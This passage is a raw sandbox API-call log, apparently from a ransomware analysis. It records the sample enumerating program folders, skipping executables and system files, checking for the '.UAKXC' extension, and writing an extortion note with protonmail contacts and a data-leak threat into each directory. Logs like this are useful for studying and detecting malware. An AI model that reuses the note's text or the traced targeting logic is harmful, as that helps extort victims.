0x0 [0154.609] StrStrIW (lpFirst="Ole DB", lpSrch="System Volume Information") returned 0x0 [0154.609] StrStrIW (lpFirst="Ole DB", lpSrch="Boot") returned 0x0 [0154.609] StrStrIW (lpFirst="Ole DB", lpSrch="Windows") returned 0x0 [0154.609] StrStrIW (lpFirst="Ole DB", lpSrch="Trend Micro") returned 0x0 [0154.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2f78 [0154.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec36b0 [0154.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0154.609] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0154.609] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2f78 | out: hHeap=0xea0000) returned 1 [0154.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21100 [0154.609] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0154.609] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0154.609] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x611bda90, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x611bda90, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x611bda90, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0154.609] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0154.609] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0154.609] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0154.609] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0154.609] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0154.609] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0154.609] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0154.609] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0154.609] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0154.609] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5390a1, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xcc5390a1, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x4556f160, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd8800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0154.609] lstrcmpW (lpString1="wab32.dll", lpString2=".") returned 1 [0154.609] lstrcmpW (lpString1="wab32.dll", lpString2="..") returned 1 [0154.609] StrStrIW (lpFirst="wab32.dll", lpSrch=".UAKXC") returned 0x0 [0154.609] StrStrIW (lpFirst="wab32.dll", lpSrch=".exe") returned 0x0 [0154.610] StrStrIW (lpFirst="wab32.dll", lpSrch=".dll") returned=".dll" [0154.610] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f46d56, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc0f46d56, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x1f9ed5b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wab32res.dll", cAlternateFileName="")) returned 1 [0154.610] lstrcmpW (lpString1="wab32res.dll", lpString2=".") returned 1 [0154.610] lstrcmpW (lpString1="wab32res.dll", lpString2="..") returned 1 [0154.610] StrStrIW (lpFirst="wab32res.dll", lpSrch=".UAKXC") returned 0x0 [0154.610] StrStrIW (lpFirst="wab32res.dll", lpSrch=".exe") returned 0x0 [0154.610] StrStrIW (lpFirst="wab32res.dll", lpSrch=".dll") returned=".dll" [0154.610] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f46d56, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc0f46d56, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x1f9ed5b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wab32res.dll", cAlternateFileName="")) returned 0 [0154.610] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0154.610] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc48 | out: hHeap=0xea0000) returned 1 [0154.610] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0154.610] Sleep (dwMilliseconds=0x32) [0154.861] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0154.861] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3658 | out: hHeap=0xea0000) returned 1 [0154.861] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3658 [0154.861] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0154.861] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0154.862] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0154.862] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0154.862] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc48 [0154.862] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2f78 [0154.862] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec36b0 [0154.862] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0154.862] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0154.862] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2f78 | out: hHeap=0xea0000) returned 1 [0154.862] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc48 | out: hHeap=0xea0000) returned 1 [0154.862] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\en-US\\R3ADM3.txt" (normalized: "c:\\program files\\dvd maker\\en-us\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0154.863] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0154.863] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0154.864] CloseHandle (hObject=0x6dc) returned 1 [0154.865] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0154.865] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0154.865] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\en-US\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x614451f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x614451f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0154.865] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0154.865] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x614451f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x614451f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.865] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0154.865] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0154.865] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DVDMaker.exe.mui", cAlternateFileName="")) returned 1 [0154.865] lstrcmpW (lpString1="DVDMaker.exe.mui", lpString2=".") returned 1 [0154.865] lstrcmpW (lpString1="DVDMaker.exe.mui", lpString2="..") returned 1 [0154.865] StrStrIW (lpFirst="DVDMaker.exe.mui", lpSrch=".UAKXC") returned 0x0 [0154.865] StrStrIW (lpFirst="DVDMaker.exe.mui", lpSrch=".exe") returned=".exe.mui" [0154.865] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OmdProject.dll.mui", cAlternateFileName="")) returned 1 [0154.866] lstrcmpW (lpString1="OmdProject.dll.mui", lpString2=".") returned 1 [0154.866] lstrcmpW (lpString1="OmdProject.dll.mui", lpString2="..") returned 1 [0154.866] StrStrIW (lpFirst="OmdProject.dll.mui", lpSrch=".UAKXC") returned 0x0 [0154.866] StrStrIW (lpFirst="OmdProject.dll.mui", lpSrch=".exe") returned 0x0 [0154.866] StrStrIW (lpFirst="OmdProject.dll.mui", lpSrch=".dll") returned=".dll.mui" [0154.866] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x614451f0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x614451f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x614451f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0154.866] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0154.866] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0154.866] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0154.866] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0154.866] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0154.866] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0154.866] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0154.866] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0154.866] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0154.866] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMM2CLIP.dll.mui", cAlternateFileName="")) returned 1 [0154.866] lstrcmpW (lpString1="WMM2CLIP.dll.mui", lpString2=".") returned 1 [0154.866] lstrcmpW (lpString1="WMM2CLIP.dll.mui", lpString2="..") returned 1 [0154.866] StrStrIW (lpFirst="WMM2CLIP.dll.mui", lpSrch=".UAKXC") returned 0x0 [0154.866] StrStrIW (lpFirst="WMM2CLIP.dll.mui", lpSrch=".exe") returned 0x0 [0154.866] StrStrIW (lpFirst="WMM2CLIP.dll.mui", lpSrch=".dll") returned=".dll.mui" [0154.866] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMM2CLIP.dll.mui", cAlternateFileName="")) returned 0 [0154.866] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0154.867] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc98 | out: hHeap=0xea0000) returned 1 [0154.867] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0154.867] Sleep (dwMilliseconds=0x32) [0155.029] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0155.029] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3658 | out: hHeap=0xea0000) returned 1 [0155.029] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3658 [0155.029] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0155.029] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0155.029] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0155.029] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0155.029] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc98 [0155.029] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0155.029] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2f78 [0155.029] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0155.029] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2f78 | out: hHeap=0xea0000) returned 1 [0155.029] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0155.029] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc98 | out: hHeap=0xea0000) returned 1 [0155.029] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\R3ADM3.txt" (normalized: "c:\\program files\\dvd maker\\shared\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0155.159] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0155.159] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0155.160] CloseHandle (hObject=0x6dc) returned 1 [0155.161] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0155.161] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0155.161] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61718c10, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x61718c10, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0155.161] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0155.161] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61718c10, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x61718c10, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.161] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0155.161] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0155.161] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dab239, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93dab239, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x68934cfd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x30e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Common.fxh", cAlternateFileName="")) returned 1 [0155.161] lstrcmpW (lpString1="Common.fxh", lpString2=".") returned 1 [0155.161] lstrcmpW (lpString1="Common.fxh", lpString2="..") returned 1 [0155.161] StrStrIW (lpFirst="Common.fxh", lpSrch=".UAKXC") returned 0x0 [0155.161] StrStrIW (lpFirst="Common.fxh", lpSrch=".exe") returned 0x0 [0155.162] StrStrIW (lpFirst="Common.fxh", lpSrch=".dll") returned 0x0 [0155.162] StrStrIW (lpFirst="Common.fxh", lpSrch=".lnk") returned 0x0 [0155.162] StrStrIW (lpFirst="Common.fxh", lpSrch=".sys") returned 0x0 [0155.162] StrStrIW (lpFirst="Common.fxh", lpSrch=".msi") returned 0x0 [0155.162] StrStrIW (lpFirst="Common.fxh", lpSrch="R3ADM3.txt") returned 0x0 [0155.162] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc98 [0155.162] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0155.162] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0155.162] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0155.162] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0155.162] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0155.162] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc98 | out: hHeap=0xea0000) returned 1 [0155.162] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec7d0 [0155.162] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc98 [0155.162] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec768 [0155.162] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec7d0 | out: hHeap=0xea0000) returned 1 [0155.162] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0155.162] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d12cc5, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93d12cc5, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x6895ae5b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6d1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DissolveAnother.png", cAlternateFileName="")) returned 1 [0155.162] lstrcmpW (lpString1="DissolveAnother.png", lpString2=".") returned 1 [0155.162] lstrcmpW (lpString1="DissolveAnother.png", lpString2="..") returned 1 [0155.162] StrStrIW (lpFirst="DissolveAnother.png", lpSrch=".UAKXC") returned 0x0 [0155.162] StrStrIW (lpFirst="DissolveAnother.png", lpSrch=".exe") returned 0x0 [0155.162] StrStrIW (lpFirst="DissolveAnother.png", lpSrch=".dll") returned 0x0 [0155.163] StrStrIW (lpFirst="DissolveAnother.png", lpSrch=".lnk") returned 0x0 [0155.163] StrStrIW (lpFirst="DissolveAnother.png", lpSrch=".sys") returned 0x0 [0155.163] StrStrIW (lpFirst="DissolveAnother.png", lpSrch=".msi") returned 0x0 [0155.163] StrStrIW (lpFirst="DissolveAnother.png", lpSrch="R3ADM3.txt") returned 0x0 [0155.163] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0155.163] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0155.163] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0155.163] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0155.163] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0155.163] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0155.163] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0155.163] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeb30 [0155.163] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc48 [0155.163] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0155.163] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeb30 | out: hHeap=0xea0000) returned 1 [0155.163] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0155.163] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d38e22, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93d38e22, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x68980fb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb7835, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DissolveNoise.png", cAlternateFileName="")) returned 1 [0155.163] lstrcmpW (lpString1="DissolveNoise.png", lpString2=".") returned 1 [0155.163] lstrcmpW (lpString1="DissolveNoise.png", lpString2="..") returned 1 [0155.163] StrStrIW (lpFirst="DissolveNoise.png", lpSrch=".UAKXC") returned 0x0 [0155.163] StrStrIW (lpFirst="DissolveNoise.png", lpSrch=".exe") returned 0x0 [0155.163] StrStrIW (lpFirst="DissolveNoise.png", lpSrch=".dll") returned 0x0 [0155.163] StrStrIW (lpFirst="DissolveNoise.png", lpSrch=".lnk") returned 0x0 [0155.163] StrStrIW (lpFirst="DissolveNoise.png", lpSrch=".sys") returned 0x0 [0155.164] StrStrIW (lpFirst="DissolveNoise.png", lpSrch=".msi") returned 0x0 [0155.164] StrStrIW (lpFirst="DissolveNoise.png", lpSrch="R3ADM3.txt") returned 0x0 [0155.164] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0155.164] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0155.164] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0155.164] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0155.164] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0155.164] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0155.164] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0155.164] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeb30 [0155.164] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc20 [0155.164] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0155.164] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeb30 | out: hHeap=0xea0000) returned 1 [0155.164] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0155.164] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DvdStyles", 